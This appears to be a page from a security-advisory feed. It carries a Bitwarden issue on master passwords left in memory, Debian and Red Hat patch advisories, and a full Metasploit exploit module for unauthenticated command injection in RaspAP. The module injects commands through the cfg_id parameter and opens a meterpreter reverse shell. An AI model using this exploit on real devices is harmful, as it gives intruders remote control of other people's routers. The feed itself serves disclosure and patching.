Bitwarden Windows Desktop v2023.5.1 and below allows an attacker with local access to obtain sensitive information via the Bitwarden.exe process.

There is an article in German IT-magazine c't 15/2020 page 28. "Passwortmanager: Sicherheitstest | Dichtheitsprüfung | Passwortmanagern auf Speicher und Netzwerkverkehr geschaut" (translated: Password managers: security test | leak test | password managers on memory and network traffic protected" (behind pay wall)

The authors test common password managers if they keep (master) password in memory before and after login and after logout. It seems they test only the windows versions.

For Bitwarden, they found **multiple copies of master passwords in memory dumps** after login. Before login and after logout, they didn't find master password no more in memory.

> 

> Dieser Wunsch blieb unerfüllt: Lediglich vor der Eingabe des Masterpassworts konnten wir bei keinem Produkt die Existenz dieses Generalschlüssels im Speicher nachweisen. Sobald aber das Masterpasswort eingegeben war, konnte man es bei fast allen Programmen im Klartext im Speicher vorfinden. Manche vervielfältigten es sogar im Speicher. Es taucht an bis zu 20 verschiedenen Adressen auf. Dass das auch anders geht, zeigen Keepass und Sticky Password. Bei denen gelang es uns nicht, das Masterpasswort im Speicher zu finden.

> Nur einem Teil der Programme gelang es, beim Verriegeln auch das Masterpasswort wieder aus dem Speicher zu entfernen: 1Password, Bitwarden, Keepass, Keeper und Sticky Password. Bei den anderen blieb es weiter zugänglich. Trauriger Rekordhalter war Blur: Es verdoppelte die Anzahl der Fundstellen des Masterpassworts von der Anmeldung mit rund 20 auf fast 40 nach der Abmeldung. Ebenso vervielfachten sich bei Avira die Fundstellen auf immerhin zwölf.

DeepL Translation

ToDo:

*   Please check if it is possible to erase master password after login (windows versions)
*   Please check the same issue on desktop for other platforms (OS X/macOS, Linux)
*   Please check browser extentions, if they leak master password

If you need a translated version, I can try to translate article for you. Pls message me.

CVE-2023-38840: Erase Master Password in memory after login · Issue #476 · bitwarden/desktop

RaspAP is feature-rich wireless router software that just works on many popular Debian-based devices, including the Raspberry Pi. A Command Injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands in the context of the user running RaspAP via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php. Successfully tested against RaspAP 2.8.0 and 2.8.7.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'RaspAP Unauthenticated Command Injection',        'Description' => %q{          RaspAP is feature-rich wireless router software that just works          on many popular Debian-based devices, including the Raspberry Pi.          A Command Injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows          unauthenticated attackers to execute arbitrary commands in the context of the user running RaspAP via the cfg_id          parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.          Successfully tested against RaspAP 2.8.0 and 2.8.7.        },        'License' => MSF_LICENSE,        'Author' => [          'Ege BALCI <egebalci[at]pm.me>', # msf module          'Ismael0x00', # original PoC, analysis        ],        'References' => [          ['CVE', '2022-39986'],          ['URL', 'https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2'],          ['URL', 'https://github.com/advisories/GHSA-7c28-wg7r-pg6f']        ],        'Platform' => ['unix', 'linux'],        'Privileged' => false,        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => :wget,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DisclosureDate' => '2023-07-31',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => []        }      )    )    register_options(      [        Opt::RPORT(80),        OptString.new('TARGETURI', [ true, 'The URI of the RaspAP Web GUI', '/'])      ]    )  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'ajax', 'openvpn', 'del_ovpncfg.php'),      'method' => 'POST'    )    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    if res.code == 200      return CheckCode::Appears    end    CheckCode::Safe  end  def execute_command(cmd, _opts = {})    send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'ajax', 'openvpn', 'del_ovpncfg.php'),      'method' => 'POST',      'vars_post' => {        'cfg_id' => ";#{cmd};#"      }    )  end  def exploit    case target['Type']    when :unix_cmd      print_status("Executing #{target.name} with #{payload.encoded}")      execute_command(payload.encoded)    when :linux_dropper      print_status("Executing #{target.name}")      execute_cmdstager    end  endend

RaspAP 2.8.7 Unauthenticated Command Injection

Debian Linux Security Advisory 5477-1 - Several vulnerabilities have been discovered in Samba, which could result in information disclosure, denial of service or insufficient enforcement of security-relevant config directives.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5477-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 14, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : samba  
CVE ID         : CVE-2022-2127 CVE-2023-3347 CVE-2023-34966 CVE-2023-34967   
                 CVE-2023-34968  
Debian Bug     : 1041043

Several vulnerabilities have been discovered in Samba, which could result  
in information disclosure, denial of service or insufficient enforcement  
of security-relevant config directives.

The version of Samba in the oldstable distribution (bullseye) cannot be  
fully supported further: If you are using Samba as a domain controller  
you should either upgrade to the stable distribution or if that's not  
an immediate option consider to migrate to Samba from bullseye-backports  
(which will be kept updated to the version in stable). Operating Samba  
as a file/print server will continue to be supported, a separate DSA  
will provide an update update along with documentation about the scope  
of continued support.

For the stable distribution (bookworm), these problems have been fixed in  
version 2:4.17.10+dfsg-0+deb12u1.

We recommend that you upgrade your samba packages.

For the detailed security status of samba please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/samba

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTadJsACgkQEMKTtsN8  
TjamWhAAr1DOVp9DBJATMyIq2Dqcv9O6x4ipPU/NE0oLG95m9b2kTgakUuj+wQLP  
mVfbVi1n9IuRDWW16BH4b63gEx2Yvul4jDBJr42WzawBJVdnQhvNCUavmWgsdCiJ  
jc8+bSAiYYN0p076G1AoIastRPoXGjX1tQ/b1iFHG8tC9qX6qCdJy7GFlPClQqYs  
K0DdLLj1iz872rlL14zi4znHz3Gsf8d+TNmMVfMqG3aswHiYbrKd954c3/zv51zC  
DSm85I6YSgi4+4oCLqJbjlfCFFV+68U5PW86XhPSjHBA6//cvFtIdxVjqisQtV6T  
q+kPIMybAkdmG8Z+XLaPIOsBty957XMIYp0S84wTIX/MhlQ+Z6Jns5bU6yQJYN78  
ZUqamCFGMEIPO7srQDUWEG77wOJ1Jvlj70sV7Zaz9XJkGlZamJsHMBE5rlg0glKr  
gogApnCbiQgKwJcbYxjdM2CKPg8329J0Mt9HqQFxBQC0Ig005+7B+zZUMMpRdQni  
HLRgZ4deBWAP3dowt/wSfcNgqOg2SyCKPm4nSllhkesXcJwUGPAktoRNhorxMqiN  
dmOAvfYZu+HaPYKVnsdfsjUlI0Z0n+QTsaen48cAYNClNeLQySW3zpEkSqWkNJ/S  
YCPU6KabOxeXFjl2LVUTy0FHdO4fnqZJo/egS0ydgkv0t8Iwja4=  
=Roie  
-----END PGP SIGNATURE-----

Debian Security Advisory 5477-1

Red Hat Security Advisory 2023-4651-01 - Rust Toolset provides the Rust programming language compiler rustc, the cargo build tool and dependency manager, and required libraries.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: rust-toolset-1.66-rust security update  
Advisory ID:       RHSA-2023:4651-01  
Product:           Red Hat Developer Tools  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4651  
Issue date:        2023-08-15  
CVE Names:         CVE-2023-38497   
=====================================================================

1. Summary:

An update for rust-toolset-1.66-rust is now available for Red Hat Developer  
Tools.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Developer Tools for Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Developer Tools for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64

3. Description:

Rust Toolset provides the Rust programming language compiler rustc, the  
cargo build tool and dependency manager, and required libraries.

Security Fix(es):

* rust-cargo: cargo does not respect the umask when extracting dependencies  
(CVE-2023-38497)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2228038 - CVE-2023-38497 rust-cargo: cargo does not respect the umask when extracting dependencies

6. Package List:

Red Hat Developer Tools for Red Hat Enterprise Linux Server (v. 7):

Source:  
rust-toolset-1.66-rust-1.66.1-2.el7_9.src.rpm

noarch:  
rust-toolset-1.66-rust-debugger-common-1.66.1-2.el7_9.noarch.rpm  
rust-toolset-1.66-rust-gdb-1.66.1-2.el7_9.noarch.rpm  
rust-toolset-1.66-rust-lldb-1.66.1-2.el7_9.noarch.rpm  
rust-toolset-1.66-rust-src-1.66.1-2.el7_9.noarch.rpm

ppc64:  
rust-toolset-1.66-cargo-1.66.1-2.el7_9.ppc64.rpm  
rust-toolset-1.66-clippy-1.66.1-2.el7_9.ppc64.rpm  
rust-toolset-1.66-rust-1.66.1-2.el7_9.ppc64.rpm  
rust-toolset-1.66-rust-analysis-1.66.1-2.el7_9.ppc64.rpm  
rust-toolset-1.66-rust-analyzer-1.66.1-2.el7_9.ppc64.rpm  
rust-toolset-1.66-rust-debuginfo-1.66.1-2.el7_9.ppc64.rpm  
rust-toolset-1.66-rust-doc-1.66.1-2.el7_9.ppc64.rpm  
rust-toolset-1.66-rust-std-static-1.66.1-2.el7_9.ppc64.rpm  
rust-toolset-1.66-rustfmt-1.66.1-2.el7_9.ppc64.rpm

ppc64le:  
rust-toolset-1.66-cargo-1.66.1-2.el7_9.ppc64le.rpm  
rust-toolset-1.66-clippy-1.66.1-2.el7_9.ppc64le.rpm  
rust-toolset-1.66-rust-1.66.1-2.el7_9.ppc64le.rpm  
rust-toolset-1.66-rust-analysis-1.66.1-2.el7_9.ppc64le.rpm  
rust-toolset-1.66-rust-analyzer-1.66.1-2.el7_9.ppc64le.rpm  
rust-toolset-1.66-rust-debuginfo-1.66.1-2.el7_9.ppc64le.rpm  
rust-toolset-1.66-rust-doc-1.66.1-2.el7_9.ppc64le.rpm  
rust-toolset-1.66-rust-std-static-1.66.1-2.el7_9.ppc64le.rpm  
rust-toolset-1.66-rustfmt-1.66.1-2.el7_9.ppc64le.rpm

s390x:  
rust-toolset-1.66-cargo-1.66.1-2.el7_9.s390x.rpm  
rust-toolset-1.66-clippy-1.66.1-2.el7_9.s390x.rpm  
rust-toolset-1.66-rust-1.66.1-2.el7_9.s390x.rpm  
rust-toolset-1.66-rust-analysis-1.66.1-2.el7_9.s390x.rpm  
rust-toolset-1.66-rust-analyzer-1.66.1-2.el7_9.s390x.rpm  
rust-toolset-1.66-rust-debuginfo-1.66.1-2.el7_9.s390x.rpm  
rust-toolset-1.66-rust-doc-1.66.1-2.el7_9.s390x.rpm  
rust-toolset-1.66-rust-std-static-1.66.1-2.el7_9.s390x.rpm  
rust-toolset-1.66-rustfmt-1.66.1-2.el7_9.s390x.rpm

x86_64:  
rust-toolset-1.66-cargo-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-clippy-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-analysis-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-analyzer-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-debuginfo-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-doc-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-std-static-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rustfmt-1.66.1-2.el7_9.x86_64.rpm

Red Hat Developer Tools for Red Hat Enterprise Linux Workstation (v. 7):

Source:  
rust-toolset-1.66-rust-1.66.1-2.el7_9.src.rpm

noarch:  
rust-toolset-1.66-rust-debugger-common-1.66.1-2.el7_9.noarch.rpm  
rust-toolset-1.66-rust-gdb-1.66.1-2.el7_9.noarch.rpm  
rust-toolset-1.66-rust-lldb-1.66.1-2.el7_9.noarch.rpm  
rust-toolset-1.66-rust-src-1.66.1-2.el7_9.noarch.rpm

x86_64:  
rust-toolset-1.66-cargo-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-clippy-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-analysis-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-analyzer-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-debuginfo-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-doc-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-std-static-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rustfmt-1.66.1-2.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38497  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk2uDAAAoJENzjgjWX9erEaSgP/2gn/rFD6+e48xJoIeXSydES  
JJQkdPZPocfZin6bb62eJAOV8GcsHN45m0FxSSX6NRQb9Av4R4ksCPo8M2ftRvRO  
G4xy6I/ym5TSGvyWFkRxdnD1thYWyDnC83D0dnZEii/d2+7wjISreM5PKURJ/zYx  
j8GSZia8yT1znUEJd25xhPp/NNf6O8l4q67InXWEKULKQtgkJevM87wDKoSMD7Tg  
vUsTIK7941KScUw4QrfkHA6zu0aLGr3HLot57wUI+1whWC730SEDt8HGZkMAe8y1  
FBpxqBRFULbEk6DRwvvbmk2wFROXDKBzcgJB3tUUCynVRLLglEf2U/Sp8kjPu9Ij  
h7WH2Urr+gRj+iI3HWtE/M1NIUF0HDCT4PqwYCiskZ2jORpGO+4OTy4lyf3GBSed  
8zhfjfASfQBGMF9JCYKbGzH1THFqVwnNwndvKdR/DZcKi6aomcUf/X5sRm8zLNDt  
jGw2o/BKibScrmZXM8dIigGxPX02k259rDfVJrWl6TIqAtImKxsyTO2M1qDU0kWh  
4Mbsv4T5WlBn4Tp9RBdD44uUdL8ZYMXtn6msL2RUTwtcSm/tGL1OE6NkA0I4LVde  
Zr9NKOe13vH6BU5oJgU4jLdKptYtylEWHJ2uAsgA1c0+58frnbFah+yjEU24VL88  
bS3EcqdJYl2QIGy5nyDM  
=0C7F  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4651-01

Red Hat Security Advisory 2023-4635-01 - Rust Toolset provides the Rust programming language compiler rustc, the cargo build tool and dependency manager, and required libraries.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: rust-toolset:rhel8 security update  
Advisory ID:       RHSA-2023:4635-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4635  
Issue date:        2023-08-14  
CVE Names:         CVE-2023-38497   
=====================================================================

1. Summary:

An update for the rust-toolset:rhel8 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Rust Toolset provides the Rust programming language compiler rustc, the  
cargo build tool and dependency manager, and required libraries.

Security Fix(es):

* rust-cargo: cargo does not respect the umask when extracting dependencies  
(CVE-2023-38497)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2228038 - CVE-2023-38497 rust-cargo: cargo does not respect the umask when extracting dependencies

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
rust-1.66.1-2.module+el8.8.0+19613+f0bba33b.src.rpm

aarch64:  
cargo-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm  
cargo-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm  
clippy-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm  
clippy-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm  
rust-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm  
rust-analysis-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm  
rust-analyzer-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm  
rust-analyzer-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm  
rust-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm  
rust-debugsource-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm  
rust-doc-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm  
rust-std-static-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm  
rust-std-static-wasm32-unknown-unknown-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm  
rust-std-static-wasm32-wasi-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm  
rust-toolset-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm  
rustfmt-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm  
rustfmt-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.aarch64.rpm

noarch:  
rust-debugger-common-1.66.1-2.module+el8.8.0+19613+f0bba33b.noarch.rpm  
rust-gdb-1.66.1-2.module+el8.8.0+19613+f0bba33b.noarch.rpm  
rust-lldb-1.66.1-2.module+el8.8.0+19613+f0bba33b.noarch.rpm  
rust-src-1.66.1-2.module+el8.8.0+19613+f0bba33b.noarch.rpm

ppc64le:  
cargo-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm  
cargo-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm  
clippy-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm  
clippy-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm  
rust-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm  
rust-analysis-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm  
rust-analyzer-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm  
rust-analyzer-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm  
rust-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm  
rust-debugsource-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm  
rust-doc-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm  
rust-std-static-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm  
rust-std-static-wasm32-unknown-unknown-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm  
rust-std-static-wasm32-wasi-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm  
rust-toolset-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm  
rustfmt-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm  
rustfmt-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.ppc64le.rpm

s390x:  
cargo-1.66.1-2.module+el8.8.0+19613+f0bba33b.s390x.rpm  
cargo-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.s390x.rpm  
clippy-1.66.1-2.module+el8.8.0+19613+f0bba33b.s390x.rpm  
clippy-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.s390x.rpm  
rust-1.66.1-2.module+el8.8.0+19613+f0bba33b.s390x.rpm  
rust-analysis-1.66.1-2.module+el8.8.0+19613+f0bba33b.s390x.rpm  
rust-analyzer-1.66.1-2.module+el8.8.0+19613+f0bba33b.s390x.rpm  
rust-analyzer-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.s390x.rpm  
rust-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.s390x.rpm  
rust-debugsource-1.66.1-2.module+el8.8.0+19613+f0bba33b.s390x.rpm  
rust-doc-1.66.1-2.module+el8.8.0+19613+f0bba33b.s390x.rpm  
rust-std-static-1.66.1-2.module+el8.8.0+19613+f0bba33b.s390x.rpm  
rust-toolset-1.66.1-2.module+el8.8.0+19613+f0bba33b.s390x.rpm  
rustfmt-1.66.1-2.module+el8.8.0+19613+f0bba33b.s390x.rpm  
rustfmt-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.s390x.rpm

x86_64:  
cargo-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm  
cargo-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm  
clippy-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm  
clippy-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm  
rust-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm  
rust-analysis-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm  
rust-analyzer-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm  
rust-analyzer-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm  
rust-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm  
rust-debugsource-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm  
rust-doc-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm  
rust-std-static-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm  
rust-std-static-wasm32-unknown-unknown-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm  
rust-std-static-wasm32-wasi-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm  
rust-toolset-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm  
rustfmt-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm  
rustfmt-debuginfo-1.66.1-2.module+el8.8.0+19613+f0bba33b.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38497  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk2ozbAAoJENzjgjWX9erEVpEP/0hiApFigMqLiLBLd5B6ktf4  
ruTEx7AXpA9drO1BmkQEwJlp0Nlr5zbOzacV62rPc7AuxQh5EKpjKRRvUzew29Ae  
j9tkEfpSPm1/qeY5cHtumaVDapdxY0zhe771sL0F99MxucpQkp3Okk+AK8gLC5nf  
0lFmBmnWCcGa6ODIez6JJPx/ghzREYzeS0Gg9FlFDBm0pP3LXoVGOZpr5R6RCTWt  
6BYyaYWWwYWU8Yu2P0p5cMO4X6sM5wPTUsmQyXVBcjFAsT9vUGMiY0v0JyeXHb2c  
vrZekj6yXHVfmG3KlPbqRwosBkKY1IqWJXkiz5pKrZNNoy21uIqDjdU7ERLsGxMn  
ZgozMGlkbBNch3Fx/EIhNyp+aY7QKipnTfCPTvPQ0ZC01T2lZkmjNe0k7OdqJz8g  
ACLq4xz7SLhdH+xHPtSs7ARg6W9bcGvLQCrgXgJoVTf/L3LWbQ7AAFa3orSwZ8QX  
Me8MadVJTKFZ6pq+MaOqKzqLnmkvpl+KqGYWpLKIC4hXKP87QNd870dNMBNyVgjG  
CtoJxwl8FFwJba5GUc9EWXo+eSpv2kvcTEcTMtzJSiprdlFaFpwWC2OS6Tju5UNq  
gfmcNGhgXoX8Z4QOH38gsHZTvg9BBYSIPG/XRKi2AGac2TfpHOwLG/AUW4oyUSvg  
WzuJxXfhZZXj27mWAGnq  
=ZDuF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4635-01

Red Hat Security Advisory 2023-4640-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: .NET 6.0 security update  
Advisory ID:       RHSA-2023:4640-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4640  
Issue date:        2023-08-14  
CVE Names:         CVE-2023-35390 CVE-2023-38180   
=====================================================================

1. Summary:

An update for .NET 6.0 is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

Security Fix(es):

* dotnet: RCE under dotnet commands (CVE-2023-35390)

* dotnet: Kestrel vulnerability to slow read attacks leading to Denial of  
Service attack (CVE-2023-38180)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2228621 - CVE-2023-38180 dotnet: Kestrel vulnerability to slow read attacks leading to Denial of Service attack  
2228622 - CVE-2023-35390 dotnet: RCE under dotnet commands

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
dotnet6.0-6.0.121-1.el8_6.src.rpm

aarch64:  
aspnetcore-runtime-6.0-6.0.21-1.el8_6.aarch64.rpm  
aspnetcore-targeting-pack-6.0-6.0.21-1.el8_6.aarch64.rpm  
dotnet-6.0.121-1.el8_6.aarch64.rpm  
dotnet-apphost-pack-6.0-6.0.21-1.el8_6.aarch64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el8_6.aarch64.rpm  
dotnet-host-6.0.21-1.el8_6.aarch64.rpm  
dotnet-host-debuginfo-6.0.21-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-6.0.21-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-6.0.21-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-6.0.121-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el8_6.aarch64.rpm  
dotnet-targeting-pack-6.0-6.0.21-1.el8_6.aarch64.rpm  
dotnet-templates-6.0-6.0.121-1.el8_6.aarch64.rpm  
dotnet6.0-debuginfo-6.0.121-1.el8_6.aarch64.rpm  
dotnet6.0-debugsource-6.0.121-1.el8_6.aarch64.rpm  
netstandard-targeting-pack-2.1-6.0.121-1.el8_6.aarch64.rpm

s390x:  
aspnetcore-runtime-6.0-6.0.21-1.el8_6.s390x.rpm  
aspnetcore-targeting-pack-6.0-6.0.21-1.el8_6.s390x.rpm  
dotnet-6.0.121-1.el8_6.s390x.rpm  
dotnet-apphost-pack-6.0-6.0.21-1.el8_6.s390x.rpm  
